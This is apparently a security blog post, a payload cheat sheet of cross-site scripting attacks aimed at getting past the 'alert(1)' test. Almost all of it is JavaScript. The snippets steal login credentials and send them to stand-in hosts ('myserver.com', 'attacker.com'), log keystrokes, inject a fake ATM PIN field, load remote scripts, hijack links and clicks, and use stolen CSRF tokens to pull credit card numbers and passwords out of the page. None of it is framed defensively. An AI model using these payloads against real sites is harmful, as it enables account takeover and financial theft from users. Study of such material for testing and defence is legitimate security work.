Day 35: XSS Payloads, getting past alert(1)

Atumcell Labs
3 min readFeb 3, 2019

--

Change the third H2 on a page tag’s HTML

document.getElementsByTagName(“h2”)[2].innerHTML = “Pentested by @int0x33”;

Change the first h2

document.getElementsByTagName(“h2”)[0].innerHTML = “Pentested by @int0x33”;

Change All Page Links

var links = document.getElementsByTagName(“a”);
for (i=0; i < links.length; i++)
{
links[i].href = “https://attacker.com/malicious?id=pwned”;
links[i].innerHTML= “Save”;
}

Intercept Login Form and Steal Creds

function InterceptForm() {
var username = document.forms[0].elements[0].value;
var password = document.forms[0].elements[1].value;
new Image().src = “http://myserver.com/?username="+username+"&password="+password
}
document.forms[0].onsubmit = InterceptForm;

Add an Extra Field to Existing Form

var input = document.createElement(“input”);
input.setAttribute(“type”, “text”);
input.setAttribute(“class”, “input-block-level”);
input.setAttribute(“placeholder”, “ATM PIN”);
input.setAttribute(“name”, “atmpin”);
var previous = document.forms[0].elements[0];
document.forms[0].insertBefore(input, previous);
document.forms[0].action = “https://attacker.com";

Change Page Content

var input = document.createElement(“h2”);
input.innerHTML == “Website is down, please visit hacksite.com”;
document.forms[0].parentNode.appendChild(input);
document.forms[0].parentNode.removeChild(document.forms[0]);

Capture All Clicks and Redirect to Server

function CaughtClick() {
location.href = ‘http://myserver.com';
}
document.body.addEventListener(‘click’, CaughtClick, true);

Keylogger

document.onkeypress = function KeyLogger(inp) {
key_pressed = String.fromCharCode(inp.which);
new Image().src = “http://localhost" + key_pressed;
}

Event Listener

POC -> “ onmouseover=”alert(1);

document.forms[0].onsubmit = function demo() {
var pass = document.forms[0].elements[1].value;
alert(pass);
}

Include External Script (Good for size limited payloads)

<script src=”https://attacker.com/script.js"></script>

// use url encoder/decoder on payload

%3Cscript%20src%3D%22http%3A%2F%2Fmyserver.com%2Fscript.js%22%3E%3C%2Fscript%3E

Include External JS using JS

var newtag = document.createElement(“script”);
newtag.type = “text/javascript”;
newtag.src = “http://myserver.com/script.js";
document.body.appendChild(newtag);

Replace Banner Image

document.getElementsByTagName(“img”)[0].src = “https://attacker.com/img.jpg";

Steal From Auto-Complete

window.setTimeout( function() {
document.forms[0].action = ‘https://attacker.com';
document.forms[0].submit();
} , 10000);

Native Post Request

username = document.forms[0].elements[0].value;
password = document.forms[0].elements[1].value;
window.setTimeout( function() {
var req = new XMLHttpRequest();
req.open(“GET”, “http://myserver.com/?username="+username+"&password="+password, true);
req.send();
}, 10000)

Native Get Request

Do actions on behalf of user

var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
document.getElementById(“result”).innerHTML = req.responseText;
}
};
req.open(“GET”, “/lab/webapp/jfp/14/email?name=john”, true);
req.send();

Data Exfil with XMLHttpRequest

req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
alert(req.responseText);
new Image().src = “http://myserver.com/?cardno="+req.responseText;
}
};
req.open(“POST”, “/lab/webapp/jfp/15/cardstore”, true);
req.setRequestHeader(‘Content-type’, ‘application/x-www-form-urlencoded’);
req.send(“user=john”);

Extract CSRF Token

var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
document.getElementById(“result”).innerHTML = req.responseText;
}
};
var token = window.location.search.split(‘&’)[1];
req.open(“GET”, “/lab/webapp/jfp/14/email?name=john&”+token, true);
req.send();

Use CSRF Token

var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
document.getElementById(“result”).innerHTML = req.responseText;
}
};
var uid = document.getElementById(“uid”).innerHTML.split(‘:’)[1];
var token = document.getElementById(“scrf”).innerHTML.split(‘:’)[1];
req.open(“GET”, “/lab/webapp/jfp/17/email?uid=”+uid+”&csrf_token=”+token, true);
req.send();

HTML Parsing XMLHttpRequest

var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
var htmlPage = req.responseXML;
var address = htmlPage.getElementById(“address”).innerHTML;
document.getElementById(“result”).innerHTML = address;
}
};
req.open(“GET”, “/lab/blah/address”, true);
req.responseType = “document”;
req.send();

Multi Level App HTML Parsing

var link = document.getElementById(“settings”);
var req = new XMLHttpRequest();
var csrf_token = ‘’;
var uid = ‘’;
var req2 = new XMLHttpRequest();
req2.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
var htmlPage = req2.responseXML;
credit_card = htmlPage.getElementById(“result”).innerHTML;
document.getElementById(“result”).innerHTML = credit_card;
new Image().src = “http://myserver.com/?credit_card_number="+credit_card;
}
};
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
var htmlPage = req.responseXML;
csrf_token = htmlPage.forms[0].elements[1].value;
req2.open(“GET”, “/dir/dir/getcreditcard?uid=”+uid+”&csrf_token=”+csrf_token, true);
req2.responseType = “document”;
req2.send();
}
};
uid = link.innerHTML.split(‘:’)[1];
req.open(“GET”, link.href, true);
req.response = “document”;
req.send();

Multi Level App JSON Parsing

var link = document.getElementById(“settings”);
var req = new XMLHttpRequest();
var token = ‘’;
var uid = ‘’;
var req2 = new XMLHttpRequest();
req2.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
var pass_obj = JSON.parse(req2.responseText);
var password = pass_obj.resp.password;
document.getElementById(“result”).innerHTML = Password;
new Image().src = “http://myserver.com/?password="+password+"&uid="+uid;
}
};
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
response_obj = JSON.parse(req.responseText);
token = response_obj.params.token;
req2.open(“GET”, “/dir/dir/getpassword?token=”+token ,true);
req2.send();
}
};
uid = link.innerHTML.split(‘:’)[1];
req.open(“GET”, “/dir/dir/gettoken?uid=”+uid, true);
req.send();

Multi Level App XML Parsing

var link = document.getElementById(“settings”);
var req = new XMLHttpRequest();
var token = ‘’;
var uid = ‘’;
var req2 = new XMLHttpRequest();
req2.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
var questions = JSON.parse(req2.responseText);
document.getElementById(“result”).innerHTML = questions.q1 + “<br>” +questions.q2+ “<br>” + questions.q3;
}
};
req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200)
{
uid = req.responseXML.getElementsByTagName(“uid-param-value”)[0].childNodes[0].nodeValue;
token = req.responseXML.getElementsByTagName(“token-param-value”)[0].childNodes[0].nodeValue;
req2.open(“GET”, “/dir/dir/questions?uid=”+uid+”&token=”+token, true);
req2.send();
}
};
req.open(“GET”, link.href, true);
req.send();

Don’t forget to use url encoder on the payloads

--

--

Atumcell Labs
Atumcell Labs

Written by Atumcell Labs

Security Research Team @ Atumcell

No responses yet